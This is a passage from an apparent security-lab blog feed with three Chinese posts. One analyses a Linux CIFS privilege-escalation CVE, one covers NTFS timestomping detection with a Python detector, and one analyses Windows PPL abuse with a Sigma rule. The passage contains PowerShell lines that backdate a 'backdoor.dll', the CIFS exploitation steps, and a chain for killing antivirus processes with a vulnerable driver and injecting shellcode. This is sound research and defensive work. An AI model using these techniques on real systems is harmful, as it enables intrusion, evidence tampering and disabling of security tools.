2026年5月27日,Linux 内核 CIFS 子系统中一处本地权限提升漏洞被公开披露(CVE-2026-29453,CVSSv3 7.8)。漏洞根源在于内核未对 cifs.spnego 类型密钥的描述信息实施来源合法性校验——未实现 vet_description 钩子以验证密钥是否由内核 CIFS 模块生成。同时,cifs.upcall 用户空间辅助程序以 root 权限运行时无条件信任密钥描述中的 pid、uid、creduid 及 upcall_target 等攻击者可控字段。本地低权限用户可构造伪造的密钥描述发起 request_key 系统调用,触发 root 权限的 cifs.upcall 执行,通过命名空间切换与 NSS 模块加载实现 root 权限代码执行。本分析从漏洞原理、利用条件、影响范围与修复方案四个维度展开讨论。
关键词:Linux 内核;CIFS;SPNEGO;权限提升;request_key;CVE-2026-29453
\nCIFS(Common Internet File System)是 Linux 内核中实现 SMB 网络文件共享协议的核心子系统,支持 Kerberos 与 SPNEGO 认证机制。cifs-utils 作为配套用户空间工具,提供 cifs.upcall 辅助程序,负责处理内核 CIFS 子系统的 Kerberos/SPNEGO 认证请求,通过内核密钥环(keyring)完成凭证交互。该基础设施广泛应用于企业文件服务与跨平台存储访问场景。
CIFSwitch 漏洞的独特之处在于其攻击面位于内核密钥管理框架与用户空间辅助程序之间的信任边界——攻击者无需利用内核内存损坏,仅通过合法系统调用的参数构造即可实现权限提升。
\nLinux 内核密钥保留服务(key retention service)允许内核子系统将认证凭证以密钥形式存储于密钥环中。CIFS 子系统使用 cifs.spnego 类型的密钥描述来触发 SPNEGO 认证流程。当内核需要执行 Kerberos 认证时,通过 request_key 机制向用户空间发起上调用(upcall),由 cifs.upcall 处理认证请求并返回票据。
正常的认证流程为:
\n/sbin/request-key 触发 cifs.upcall 以 root 权限执行cifs.upcall 解析密钥描述中的参数,执行 Kerberos 票据获取漏洞的核心在于两个层面的信任缺陷:
\n内核层面:CIFS 子系统的密钥类型定义未实现 vet_description 钩子。该钩子的设计意图是在 request_key 系统调用进入处理流程之前,验证密钥描述是否确实由受信任的内核子系统生成。由于该钩子缺失,任何本地用户均可通过 request_key 系统调用提交任意 cifs.spnego 类型的密钥描述,内核无法区分合法请求与伪造请求。
用户空间层面:cifs.upcall 以 root 权限执行时,从密钥描述中提取 pid、uid、creduid 及 upcall_target 等字段并直接使用。这些字段完全由密钥描述构造者控制,cifs.upcall 未对其来源进行任何验证。
攻击者的利用路径可分解为以下步骤:
\npid、uid、upcall_target 等字段的 cifs.spnego 密钥描述request_key(\"cifs.spnego\", malicious_description, ...) 系统调用提交密钥请求/sbin/request-key 触发 cifs.upcall,该程序以 root 权限运行并解析攻击者提供的密钥描述upcall_target 中指定的目标命名空间,cifs.upcall 执行命名空间切换操作cifs.upcall 加载攻击者控制的共享库cifs.upcall 的 root 上下文中执行,完成权限提升利用需满足以下前置条件:
\ncifs.spnego request-key 规则内核层面,自 2007 年起所有支持 CIFS 且未包含补丁 3da1fdf4efbc 的 Linux 内核版本均受影响。cifs-utils ≥ 6.14 版本受影响(含部分旧版回溯修复引入问题的版本)。
已确认受影响的操作系统发行版:
\n该漏洞影响量级为百万级。由于 CIFS 是 Linux 内核的内置模块,且 cifs-utils 在多数企业级发行版中默认安装,实际暴露面极为广泛。结合非特权用户命名空间在容器化环境中的普遍启用,该漏洞对云原生基础设施构成显著威胁。
\nICE Lab 已在受控环境中对 CIFSwitch 漏洞完成复现验证。在运行受影响内核版本、安装 cifs-utils 并启用非特权用户命名空间的 Linux 系统上,以普通用户身份通过构造恶意 cifs.spnego 密钥描述发起 request_key 调用,成功触发 root 权限的 cifs.upcall 执行,验证了从本地低权限到 root 的完整提权路径。PoC 与 EXP 均已公开,技术细节已披露。
内核补丁 3da1fdf4efbc490041eb4f836bf596201203f8f2 已合并至主线,建议将内核升级至包含该补丁的版本。同时需更新 cifs-utils 软件包至修复版本。
临时缓解措施(适用于无法立即升级的环境):
\ncifs.spnego 规则——在无需 Kerberos 认证的 CIFS 场景下,可创建空规则阻断 cifs.spnego 请求CIFSwitch 漏洞的核心问题在于内核密钥管理框架的信任边界缺失——vet_description 钩子的空缺使得内核无法验证密钥描述的真实来源,而 cifs.upcall 对用户空间输入的盲目信任进一步放大了这一缺陷。该漏洞无需内存损坏即可实现权限提升,且影响范围覆盖 2007 年以来大量未打补丁的 Linux 发行版,具备高利用价值。内核补丁已发布,建议受影响用户尽快完成升级。
[1] OSS-Security. \"Linux Kernel CIFS Local Privilege Escalation.\" https://seclists.org/oss-sec/2026/q2/717
\n[2] Asim. \"CIFSwitch: From Key Descriptions to Root.\" https://heyitsas.im/posts/cifswitch/
\n[3] Linux Kernel. \"Commit 3da1fdf4efbc: CIFS Fix vet_description.\" https://github.com/torvalds/linux/commit/3da1fdf4efbc490041eb4f836bf596201203f8f2
", "url": "https://www.ce.ac.cn/blog/linux-kernel-cifswitch-lpe-analysis/", "title": "Linux Kernel CIFSwitch 本地权限提升漏洞分析(CVE-2026-29453)", "summary": "针对 Linux 内核 CIFS SPNEGO 密钥描述验证缺失导致的本地权限提升漏洞的技术分析,涉及 request_key 机制滥用与 cifs.upcall 信任边界突破。", "date_modified": "2026-05-27T00:00:00.000Z", "author": { "name": "ICE Lab" }, "tags": [ "Vulnerability", "Disclosure", "Research", "Kernel Security", "Privilege Escalation" ] }, { "id": "https://www.ce.ac.cn/blog/ntfs-timestamp-forensic-analysis/", "content_html": "文件系统时间戳是数字取证中重建攻击时间线的核心依据,但其本身也是攻击者篡改的重点目标。NTFS 文件系统同时维护四套独立的时间戳记录机制——MFT 的 $STANDARD_INFORMATION 与 $FILE_NAME 属性、USN Journal 变更日志与 $LogFile 事务日志,各自以不同的精度、更新规则与访问权限运行。本文系统分析 NTFS 时间戳架构的取证价值,分类讨论三种 Timestomping 手段的技术原理与固有痕迹,提出基于四源交叉验证的自动化检测框架,并给出基于 MFTECmd 与 exhume_ntfs 的实战工具链实现。
\n关键词:NTFS;Timestomping;数字取证;USN Journal;MFT
\nNTFS 是 Windows 操作系统的核心文件系统,其时间戳存储机制远非单一的时间值数组。MFT(主文件表)中的 $STANDARD_INFORMATION($SI)和 $FILE_NAME($FN)属性各自独立维护文件的 MACB(修改、访问、MFT 变更、创建)时间戳,且更新规则迥异。此外,USN Journal 以变更日志形式记录每次文件操作的精确时刻与原因码,$LogFile 则以事务日志形式保存元数据操作的底层序列。
这种多源冗余设计在文件系统一致性层面或属偶然,但在数字取证领域构成了天然的时间戳交叉验证体系。攻击者常利用 Timestomping 技术篡改 $SI 时间戳以掩盖入侵痕迹,但 $FN、USN Journal 及 $LogFile 中的对应记录往往被忽略——三者之间的微秒级精度不一致,恰构成最坚固的证据链。
NTFS 以 MFT 为核心索引结构,每个文件对应一条 MFT 记录。每条记录包含多个属性,其中 $STANDARD_INFORMATION(属性类型 0x10)与 $FILE_NAME(属性类型 0x30)各自独立存储文件的 MACB 时间戳。
$SI 属性的时间戳与文件内容的交互相关——文档编辑、权限变更或数据写入均会触发 $SI 更新。$FN 属性的时间戳与文件位置和名称的交互相关——重命名、移动等操作触发 $FN 更新。这种设计分歧制造了天然的双轨取证系统:同一文件在不同元数据属性中可能存储着差异化的时间信息。
\n关键点在于,攻击者通常只修改 $SI 时间戳,而忽略 $FN 中的副本。修改 $SI 可通过用户态 API 完成——Cobalt Strike、Timestomp.exe 和 Metasploit 均内置此功能。修改 $FN 则需内核 API 或利用 Windows 的文件重命名机制将 $SI 自动复制到 $FN。
\n每条 MFT 记录固定为 1024 字节(1 KiB)。前 42 字节为 FileRecordHeader,其后为属性序列,以 0xFFFFFFFF 结束标记终止。关键字段如下:
| 字段 | 类型 | 偏移 | 描述 |
|---|---|---|---|
signature | [u8; 4] | 0x00 | 总是 b\"FILE\" |
usa_offset | u16 | 0x04 | 更新序列数组偏移 |
lsn | u64 | 0x08 | $LogFile 序列号,用于日志关联 |
sequence_number | u16 | 0x10 | 每次记录复用递增 |
attrs_offset | u16 | 0x14 | 首个属性偏移(通常 0x30) |
flags | u16 | 0x16 | 0x01=已分配, 0x02=目录 |
base_file_record | u64 | 0x20 | 扩展记录指向基本记录 |
其中 lsn 字段是连接 MFT 与 $LogFile 两大取证数据源的核心桥梁,记录了最后一次修改此 MFT 记录的日志序列号。属性头部标识类型(0x10 = $SI,0x30 = $FN,0x80 = $DATA)及常驻/非常驻状态。
NTFS 时间戳以 64 位 FILETIME 格式存储,精度 100 纳秒,起始点 1601 年 1 月 1 日。正常文件操作产生的时间戳具有精确的纳秒分量——例如 131683876627452045 对应 2018-04-16 21:27:42.7452045。当攻击者使用系统工具(如 PowerShell 的 Get-Item)修改时间戳时,纳秒分量通常被置零——131683876620000000 虽然对应同一时刻,但纳秒部分全零在整数表示中极为突出。
值得强调的是,纳秒全零检测仅能捕获使用标准系统工具的低水平攻击者。经过定制的高级攻击工具(如 Metasploit 的 timestomp 模块)可生成带真实纳秒精度的时间戳,此时纳秒检测本身不足以排除篡改可能。
\nUSN Journal(\\$Extend\\$UsnJrnl)是 NTFS 为每次文件系统变更提供的持久化日志,包含两个备用数据流:$J(实际变更记录)和 $Max(配置信息)。其核心价值在于记录文件创建、删除、重命名与数据变更的高层次操作,不受操作者权限或意图影响。
USN Record 经历三个版本演进:
\n| 版本 | 引入版本 | 文件引用大小 | 包含文件名 | 包含时间戳 | 核心特性 |
|---|---|---|---|---|---|
| v2 | Vista | 64 位 | 是 | 是 | 基础记录 |
| v3 | Windows 8 | 128 位 | 是 | 是 | 扩展文件引用 |
| v4 | Windows 10 | 128 位 | 否 | 否 | Range Tracking |
v4 记录的核心设计转变在于关注文件被修改的具体字节范围而非文件名与时间戳。其 USN_RECORD_EXTENT 结构(Offset / Length)精确记录修改的字节偏移范围。Windows 保证每次 Range Tracking 产生 v4 记录后,文件关闭时会追加一条含 USN_REASON_CLOSE 的 v3 记录以补全文件名和时间戳。
USN_REASON 位掩码的关键取证含义:
\nUSN_REASON_DATA_OVERWRITE(0x00000002):精确标记文件数据被覆盖的时刻。攻击者修改 MFT $SI 时间戳后,后续任何数据写入操作均被记录,且此记录无法被追溯性删除或篡改。USN_REASON_BASIC_INFO_CHANGE(0x00008000):直接对应文件属性修改,包括时间戳篡改本身——该记录就是 Timestomping 操作的最直接证据。USN_REASON_FILE_CREATE(0x00000100):文件首次创建的精确时刻,可用于与 MFT 声称的创建时间进行比对。$LogFile 是 NTFS 的事务日志,以预写式日志(WAL)机制记录文件系统元数据的每一次变更操作。与 USN Journal 记录高层次操作不同,$LogFile 记录的是底层元数据变更——一个 USN 事件可能在 $LogFile 中对应数十条低层次记录。
\n常见操作码与取证含义:
\n| 操作 | $LogFile 操作 | USN Journal 对应事件 |
|---|---|---|
| 文件创建 | InitializeFileRecordSegment + AddIndexEntryAllocation | FileCreate |
| 文件删除 | DeleteIndexEntryAllocation + DeallocateFileRecordSegment | FileDelete |
| 重命名 | DeleteIndexEntryAllocation + AddIndexEntryAllocation | RenameOldName → RenameNewName |
| 时间戳修改 | SetBasicInfo + UpdateStandardInfo | BasicInfoChange |
其关键取证价值在于:当攻击者修改 $SI 时间戳时,$LogFile 中会留下 OpenFileRecord → SetBasicInfo → UpdateStandardInfo → CloseFileRecord 的操作序列。若攻击者通过文件重命名同步修改 $FN,还会包含 DeleteIndexEntry → UpdateFileName → AddIndexEntry。无论 MFT 中如何修改,$LogFile 中各操作的相对时序和间隔均揭示真实过程。
攻击者利用用户态 API 直接修改 $SI 时间戳,是最基础也最广泛使用的 Timestomping 手段:
\n(Get-Item \"backdoor.dll\").CreationTime = (Get-Date \"2020-03-15\")
(Get-Item \"backdoor.dll\").LastWriteTime = (Get-Date \"2020-03-15\")
痕迹:仅修改 $SI,$FN 不随动,两者时间戳产生偏差;纳秒分量被置零;USN Journal 中产生 BASIC_INFO_CHANGE 记录。
攻击者先通过用户态 API 修改 $SI,随后移动或重命名文件。Windows 自动将修改后的 $SI 时间戳复制到 $FN 属性,使两组时间戳保持一致。
\n痕迹:尽管 $SI/$FN 不再矛盾,但 USN Journal 中同时留下 BASIC_INFO_CHANGE(Timestomping 时刻)和 RENAME_OLD_NAME / RENAME_NEW_NAME(重命名时刻)的记录序列。攻击者无法追溯性修改这两类事件的时间戳。
在未引入 Patch Guard 的旧版 Windows 上,攻击者可通过 NtSetInformationFile 和 NtQueryInformationFile 直接修改 $FN 时间戳。通过直接磁盘写入,还可同时修改两条 MFT 属性而不触发文件系统级事件。
痕迹:$SI 与 $FN 一致,USN Journal 仍会记录 BASIC_INFO_CHANGE。直接磁盘写入虽可绕过部分日志,但对 $LogFile 的篡改本身会产生新的日志记录——完全无痕在技术上极其困难。
真正无痕的 Timestomping 需同时满足:内核级直接磁盘写入修改 $SI 和 $FN;修改或删除 USN Journal 中关联的 BASIC_INFO_CHANGE 记录;修改或删除 $LogFile 中关联的事务记录;确保所有修改的纳秒精度一致。USN Journal 与 $LogFile 使用不同的二进制格式和存储机制,且对日志的修改本身又会产生新的记录——这使得完全无痕的 Timestomping 在理论可行但实际操作中几乎无法实现。
2025 年,安全研究员 Sergey Tarasov 披露了 $LogFile 日志重放机制中的本地提权漏洞 CVE-2025-49689,影响自 Windows XP SP1 以来所有版本。漏洞根源在于 ntfs!NtfsMountVolume 解析 $LogFile 事务记录时的整型溢出,可导致任意覆写与安全描述符篡改。
这一发现对取证分析提出了新的挑战:攻击者可利用 $LogFile 日志重放机制向文件系统注入恶意记录,制造虚假操作时间线,或直接擦除关键事务记录。常规的取证假设——\"$LogFile 记录总是真实可信\"——需要在漏洞利用场景下重新审视。
\n给定以下四套独立时间戳记录体系:
\n| 数据源 | 时间戳类型 | 精度 | 可篡改程度 | 存储位置 |
|---|---|---|---|---|
| $SI | MACB | 100 纳秒 | 用户态 API | MFT $STANDARD_INFORMATION |
| $FN | MACB | 100 纳秒 | 需内核 API 或重命名 | MFT $FILE_NAME |
| USN Journal | 操作时间 | 取决于记录 | 需内核权限,操作留痕 | \\$UsnJrnl:\\$J |
| $LogFile | 事务时间 | 取决于记录 | 极高难度,需直接写磁盘 | \\$LogFile |
交叉验证的核心逻辑:若同一文件的四套时间戳之间存在不一致(如 $SI 显示 2018 年的创建时间,但 USN Journal 显示该文件 2025 年才首次出现 FILE_CREATE 事件),则 $SI 时间戳必然是伪造的。
以可疑可执行文件为例:
\nFILE_CREATE(首现时刻)和 BASIC_INFO_CHANGE(Timestomping 时刻)记录。SetBasicInfo 操作的时间即为 Timestomping 真实时刻。以下 Python 脚本基于 MFTECmd 的 CSV 输出实现四源交叉验证:
\n#!/usr/bin/env python3
\"\"\"
四源 Timestomping 检测引擎 — 基于 MFTECmd CSV 输出的交叉验证
\"\"\"
import csv
from datetime import datetime, timedelta
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional, List, Dict
WINDOWS_TICK = 10000000
SEC_TO_UNIX_EPOCH = 11644473600
def filetime_to_datetime(ft: int) -> datetime:
if ft == 0:
return datetime(1601, 1, 1)
return datetime.utcfromtimestamp(
(ft - SEC_TO_UNIX_EPOCH * WINDOWS_TICK) / WINDOWS_TICK)
def check_nanosecond_zero(ft: int) -> bool:
return (ft % 10000000) == 0
@dataclass
class MftTimestampRecord:
file_name: str; full_path: str; mft_entry: int
si_created: datetime; si_modified: datetime
si_accessed: datetime; si_mft_changed: datetime
fn_created: datetime; fn_modified: datetime
fn_accessed: datetime; fn_mft_changed: datetime
si_created_raw: int; fn_created_raw: int
@dataclass
class UsnRecord:
timestamp: datetime; reason: str
reason_code: int; mft_entry: int; file_name: str
@dataclass
class TimestompingAlert:
file_path: str; severity: str
alert_type: str; evidence: List[str]
si_time: Optional[datetime]; fn_time: Optional[datetime]
usn_time: Optional[datetime]; logfile_time: Optional[datetime]
class TimestompingDetector:
def __init__(self):
self.mft_records: Dict[int, MftTimestampRecord] = {}
self.usn_records: Dict[int, List[UsnRecord]] = defaultdict(list)
def load_mft_csv(self, csv_path: str):
with open(csv_path, 'r', encoding='utf-8') as f:
for row in csv.DictReader(f):
entry = int(row.get('EntryNumber', 0))
si_c = int(row.get('SICreated', 0))
fn_c = int(row.get('FNCreated', 0))
self.mft_records[entry] = MftTimestampRecord(
file_name=row.get('FileName', ''),
full_path=row.get('FullPath', ''),
mft_entry=entry,
si_created=filetime_to_datetime(si_c),
si_modified=filetime_to_datetime(int(row.get('SILastModified', 0))),
si_accessed=filetime_to_datetime(int(row.get('SILastAccess', 0))),
si_mft_changed=filetime_to_datetime(int(row.get('SIMFTChanged', 0))),
fn_created=filetime_to_datetime(fn_c),
fn_modified=filetime_to_datetime(int(row.get('FNLastModified', 0))),
fn_accessed=filetime_to_datetime(int(row.get('FNLastAccess', 0))),
fn_mft_changed=filetime_to_datetime(int(row.get('FNMFTChanged', 0))),
si_created_raw=si_c, fn_created_raw=fn_c)
def load_usn_csv(self, csv_path: str):
with open(csv_path, 'r', encoding='utf-8') as f:
for row in csv.DictReader(f):
entry = int(row.get('FileMFTEntryNumber', 0))
ts = filetime_to_datetime(int(row.get('TimeStamp', 0)))
reason_code_str = row.get('ReasonCode', '0')
if reason_code_str.startswith('0x'):
reason_code = int(reason_code_str, 16)
else:
reason_code = int(reason_code_str)
self.usn_records[entry].append(UsnRecord(
timestamp=ts, reason=row.get('Reason', ''),
reason_code=reason_code, mft_entry=entry,
file_name=row.get('Name', '')))
def detect_all(self) -> List[TimestompingAlert]:
alerts = []
for entry, mft in self.mft_records.items():
alerts.extend(self._check_si_fn_discrepancy(mft))
alerts.extend(self._check_nanosecond_zero(mft))
alerts.extend(self._check_usn_mft_conflict(mft))
return alerts
def _check_si_fn_discrepancy(self, mft) -> List[TimestompingAlert]:
alerts = []
threshold = timedelta(seconds=1)
if abs(mft.si_created - mft.fn_created) > threshold:
alerts.append(TimestompingAlert(
file_path=mft.full_path, severity=\"HIGH\",
alert_type=\"SI_FN_CREATION_MISMATCH\",
evidence=[f\"$SI 创建时间: {mft.si_created}\",
f\"$FN 创建时间: {mft.fn_created}\"],
si_time=mft.si_created, fn_time=mft.fn_created,
usn_time=None, logfile_time=None))
return alerts
def _check_nanosecond_zero(self, mft) -> List[TimestompingAlert]:
alerts = []
if mft.si_created_raw > 0 and check_nanosecond_zero(mft.si_created_raw):
alerts.append(TimestompingAlert(
file_path=mft.full_path, severity=\"MEDIUM\",
alert_type=\"NANOSECOND_ZERO\",
evidence=[\"$SI 纳秒全零: 可能使用 PowerShell/fsutil\"],
si_time=mft.si_created, fn_time=None,
usn_time=None, logfile_time=None))
return alerts
def _check_usn_mft_conflict(self, mft) -> List[TimestompingAlert]:
alerts = []
for usn in self.usn_records.get(mft.mft_entry, []):
if usn.reason_code & 0x00000100:
if usn.timestamp > mft.si_created:
alerts.append(TimestompingAlert(
file_path=mft.full_path, severity=\"CRITICAL\",
alert_type=\"USN_CREATE_AFTER_SI_CREATED\",
evidence=[f\"USN FILE_CREATE: {usn.timestamp}\",
f\"$SI 创建时间: {mft.si_created}\",
\"MFT 创建时间早于 USN 记录的实际创建时间\"],
si_time=mft.si_created, fn_time=mft.fn_created,
usn_time=usn.timestamp, logfile_time=None))
if usn.reason_code & 0x00008000:
alerts.append(TimestompingAlert(
file_path=mft.full_path, severity=\"HIGH\",
alert_type=\"BASIC_INFO_CHANGE_DETECTED\",
evidence=[f\"USN BASIC_INFO_CHANGE: {usn.timestamp}\",
\"直接对应 Timestomping 操作\"],
si_time=None, fn_time=None,
usn_time=usn.timestamp, logfile_time=None))
return alerts
if __name__ == \"__main__\":
detector = TimestompingDetector()
detector.load_mft_csv(\"./forensic_output/MFT.csv\")
detector.load_usn_csv(\"./forensic_output/USNJrnl.csv\")
alerts = detector.detect_all()
for alert in sorted(alerts, key=lambda a:
[\"CRITICAL\",\"HIGH\",\"MEDIUM\",\"LOW\"].index(a.severity)):
print(f\"[{alert.severity}] {alert.alert_type}\")
print(f\" 文件: {alert.file_path}\")
for ev in alert.evidence:
print(f\" - {ev}\")
该引擎实现三条核心规则:$SI/$FN 创建时间差异超过 1 秒触发 SI_FN_CREATION_MISMATCH(HIGH);$SI 纳秒全零触发 NANOSECOND_ZERO(MEDIUM);USN Journal 的 FILE_CREATE 时间晚于 $SI 创建时间触发 USN_CREATE_AFTER_SI_CREATED(CRITICAL),BASIC_INFO_CHANGE 记录直接触发 BASIC_INFO_CHANGE_DETECTED(HIGH)。
推荐工具链整合如下:
\n$MFT 与 $J 文件。使用方法:MFTECmd.exe -f \"\\$J\" -m \"\\$MFT\" --csv \"C:\\Output\"$LogFile 事务日志,搜索与特定 MFT 记录关联的 SetBasicInfo 操作四源交叉验证虽提供了时间戳篡改检测的体系化方法,但仍存在以下局限:
\n$UsnJrnl:\\$J 通常为 32MB–128MB,在繁忙系统上仅保留数小时至数天的历史。sequence_number 不匹配时 USN 记录可能指向错误文件。exhume_ntfs 等工具通过追踪复用事件来缓解此问题。NTFS 的四套时间戳记录机制构成了天然的时间线交叉验证体系。$SI 与 $FN 的双轨存储使简单的时间戳篡改留下可检测的差异;USN Journal 以不可追溯性修改的方式记录每一次属性变更与数据写入操作;$LogFile 以事务日志形式保存元数据操作的底层序列。三者结合的交叉验证框架能够有效检测从 PowerShell 脚本到内核级工具的不同层次 Timestomping 行为。CVE-2025-49689 的发现提醒取证分析人员,$LogFile 本身也是攻击面的一部分,需要纳入可信度评估范围。
\n[1] Eric Zimmerman. \"MFTECmd: MFT and USN Journal Parser.\" https://github.com/EricZimmerman/MFTECmd
\n[2] forensicxlab. \"exhume_ntfs: NTFS Forensic Parsing Library.\" Rust implementation.
\n[3] Sergey Tarasov. \"CVE-2025-49689: NTFS $LogFile Replay Privilege Escalation.\"
\n[4] Microsoft. \"NTFS Technical Reference.\" MSDN Documentation.
\n[5] Harlan Carvey. \"Windows Forensic Analysis Toolkit.\" 4th Edition.
", "url": "https://www.ce.ac.cn/blog/ntfs-timestamp-forensic-analysis/", "title": "NTFS 文件系统时间戳取证分析:Timestomping 检测与四源交叉验证框架", "summary": "针对 NTFS 文件系统四套独立时间戳记录机制的取证分析,涵盖 MFT $SI/$FN 双轨架构、USN Journal 三版本演进及 $LogFile 事务日志,提出 Timestomping 自动化检测框架。", "date_modified": "2026-05-25T00:00:00.000Z", "author": { "name": "ICE Lab" }, "tags": [ "Research", "Vulnerability" ] }, { "id": "https://www.ce.ac.cn/blog/ppl-abuse-technical-analysis/", "content_html": "Windows 受保护进程轻量级(PPL)是微软自 Windows 8.1 起构建的核心安全边界,通过基于数字签名的层级信任模型防止恶意代码篡改反恶意软件与端点安全产品。然而,PPL 的设计将密码学签名验证等同于运行时行为可信,形成结构性信任锚点缺陷。本文以三类独立 PPL 滥用技术——WerFaultSecure 竞态条件、ClipUp 二进制代理执行及 WaaSRemediation COM 对象操控——为分析对象,拆解其技术原理,构建集 BYOVD、竞态冻结、PPL 代理与 WDAC 策略部署于一体的四阶段融合攻击链,并讨论当前防御体系中的检测盲区与结构性修复瓶颈。
\n关键词:Windows PPL;受保护进程;EDR 绕过;信任模型;BVOVD
\nWindows Vista 首次引入受保护进程(PP)模型,进程状态被二分为受保护与不受保护两类。该过于简化的设计无法适应实际安全需求。Windows 8.1 起引入的 PPL 扩展了该概念,通过签名者类型(Signer Type)建立多级信任层级,使不同受保护进程之间具备差异化的访问权限。
\n设计之初,PPL 被赋予了超出其实际实现能力的安全期望。数字签名的密码学意义在于验证二进制文件的来源与完整性,它回答的是\"该文件确实由声称的发行者发布且未被篡改\"。然而,Windows 内核加载机制将这一密码学保证直接等同于\"该进程可在受保护上下文中执行\",在信任传递过程中制造了语义鸿沟。当攻击者寻找到签名为 WinTcb 层级的合法二进制并将其武器化,整个信任层级便从内部崩塌。
\nPP/PPL 进程可请求的访问权限取决于自身的保护级别,该级别部分由文件数字证书中的增强密钥使用(EKU)字段决定。进程创建时,保护信息存入 EPROCESS 内核结构,存储内容包含保护类型(PP 或 PPL)及签名者类型。
\n签名者类型在 PP/PPL 之间构建了严格层级:
\nPPL 的签名者类型构成四条明确的信任等级:
\n| 保护层级 | 签名者类型 | 典型进程 | 关键特权 | 可访问对象 |
|---|---|---|---|---|
| WinTcb-Light | WinTcb (4) | smss.exe, csrss.exe, WerFaultSecure.exe | 最高 PPL 权限 | 所有 PP/PPL |
| Antimalware-Light | Antimalware (3) | MsMpEng.exe, Windefend | 可终止大多数安全进程 | WinTcb 以下 |
| Lsa-Light | Lsa (2) | lsass.exe | 可访问 Lsa 及以下 | Lsa-Light 及以下 |
| Windows-Light | Windows (1) | winlogon.exe, svchost.exe | 基础 PPL 保护 | 仅自身等级 |
以下代码通过未公开的 ProcessProtectionLevelInfo 枚举值(0x3F)查询进程的 PPL 保护级别:
// ppl_check.c
// 编译: cl ppl_check.c /link psapi.lib
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#include <psapi.h>
#define ProcessProtectionLevelInfo 0x3F
typedef struct _PROCESS_PROTECTION_LEVEL_INFORMATION {
DWORD ProtectionLevel;
} PROCESS_PROTECTION_LEVEL_INFORMATION;
const char* GetSignerType(DWORD level) {
DWORD signer = (level >> 4) & 0xF;
switch (signer) {
case 0: return \"None\";
case 1: return \"Windows\";
case 2: return \"Lsa\";
case 3: return \"Antimalware\";
case 4: return \"WinTcb\";
case 5: return \"WinSystem\";
default: return \"Unknown\";
}
}
const char* GetProtectionType(DWORD level) {
DWORD type = level & 0xF;
switch (type) {
case 0: return \"None\";
case 1: return \"Protected Light (PPL)\";
case 2: return \"Protected (PP)\";
default: return \"Unknown\";
}
}
void CheckProcessProtection(DWORD pid) {
HANDLE hProcess = OpenProcess(
PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);
if (!hProcess) {
printf(\"[-] 无法打开进程 PID %d\\n\", pid);
return;
}
PROCESS_PROTECTION_LEVEL_INFORMATION protInfo = {0};
ULONG returnLength = 0;
NTSTATUS status = NtQueryInformationProcess(
hProcess, ProcessProtectionLevelInfo,
&protInfo, sizeof(protInfo), &returnLength);
CloseHandle(hProcess);
if (NT_SUCCESS(status)) {
printf(\"[*] PID %d | %s | %s (0x%X)\\n\",
pid, GetProtectionType(protInfo.ProtectionLevel),
GetSignerType(protInfo.ProtectionLevel),
protInfo.ProtectionLevel);
}
}
2025 年 8 月,Zero Salarium 安全研究员首次披露了通过滥用 WerFaultSecure.exe 绕过 PPL 的技术。2025 年 9 月,该技术被封装为 EDR-Freeze 工具发布,证明纯用户态代码即可冻结 EDR 进程,无需 BYOVD 驱动。
\n攻击原理利用了 Windows 错误报告(WER)框架中 MiniDumpWriteDump 函数的副作用。该函数来自 DbgHelp 库,用于创建进程崩溃转储。为确保内存状态一致性,它在转储前会挂起目标进程的所有线程。WerFaultSecure.exe 以最高 WinTcb PPL 标签运行,专门收集受保护进程的崩溃转储。攻击者将两者组合,可在安全进程上触发 MiniDumpWriteDump,使其线程被挂起。
攻击流程要求精确的时序控制:
\n在测试中,EDR-Freeze 在完全更新的 Windows 11 24H2 系统上成功挂起 MsMpEng.exe 长达 5 秒。由于 WerFaultSecure 是 Windows 自带的可信二进制且运行在 PPL 上下文中,其行为对安全产品而言完全透明。
\nClipUp.exe 位于 System32 目录,是微软签名的合法二进制,以 PPL 权限运行,原本功能为处理剪贴板相关操作。当在特定条件下以特定参数启动时,该程序会加载并执行来自非标准路径的 DLL,在 PPL 保护上下文内执行攻击者代码。
\n通过 PPL 上下文的代理执行,攻击者可实现普通用户态下不可能的操作,包括修改受保护进程内存、覆盖或删除 Defender 关键文件,以及修改相关注册表项。Elastic Security Labs 在对 RONINGLOADER 的分析中发现了该技术,并确认其已被 Dragon Breath APT 用于实际攻击活动。
\n以下 Sigma 规则可用于检测针对 ClipUp.exe 的注册表篡改行为:
\ntitle: ClipUp.exe 服务 ImagePath 篡改检测
id: ae8f85a3-c3e8-4d1f-9a51-2b3fba56d1c1
status: stable
description: 检测将服务 ImagePath 修改为执行 ClipUp.exe 的注册表行为
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-01-29
tags:
- attack.defense-impairment
- attack.privilege-escalation
- attack.t1685
- attack.t1068
logsource:
product: windows
category: registry_event
detection:
selection:
EventID: 13
TargetObject|contains: '\\SYSTEM\\CurrentControlSet\\Services\\'
TargetObject|endswith: '\\ImagePath'
Details|contains|all:
- 'ClipUp.exe'
- '-p'
- '-o'
filter_defender_update:
TargetObject|contains:
- '\\WinDefend\\'
- '\\WdFilter\\'
Details|contains: '\\Program Files\\Windows Defender\\'
condition: selection and not filter_defender_update
level: high
IBM X-Force 安全研究员 Mohamed Fakroud 与 Jimmy Bayne 发现了一种通过操控 DCOM 远程技术中按引用封送的对象指针,在服务端 DCOM 进程上下文中执行任意 .NET 托管代码的方法。
\n该技术的关键利用对象是 WaaSRemediation COM 类及其暴露的 IDispatch 接口。WaaSRemediation 在 WaaSMedicSvc 服务中实现,该服务以 NT AUTHORITY\\SYSTEM 身份且附带 PPL 保护运行。攻击的核心在于 COM 对象的后期绑定机制:IDispatch 接口允许客户端在运行时动态发现并调用对象方法,通过 ITypeInfo 和 ITypeLib 接口解析类型信息。攻击者通过构造恶意的 ITypeLib 引用,可诱导 WaaSMedicSvc 服务加载攻击者控制的 .NET 程序集。
Forshaw 的研究进一步描述了具体 PPL 绕过用例:通过操控 WaaSRemediation COM 类暴露的 IDispatch 接口,实现受困 COM 对象滥用与 .NET 代码执行。
\n在实际攻击环境中,单独使用上述任意一种技术都难以实现完整攻击目标。本节构建一条集成四阶段攻击链:
\n第一阶段:BYOVD 驱动级进程终止。 利用合法签名内核驱动注册单一函数,通过 IOCTL 接口接收目标进程 ID,使用 ZwTerminateProcess 在核心态终止目标进程,绕过包括 PPL 在内的所有用户态保护机制。针对不同安全产品可采用定制化策略:对 Defender、金山毒霸等直接加载驱动终止进程;对 360 Total Security 额外通过防火墙规则阻断其网络通信,并将 shellcode 注入 VSS 服务进程。
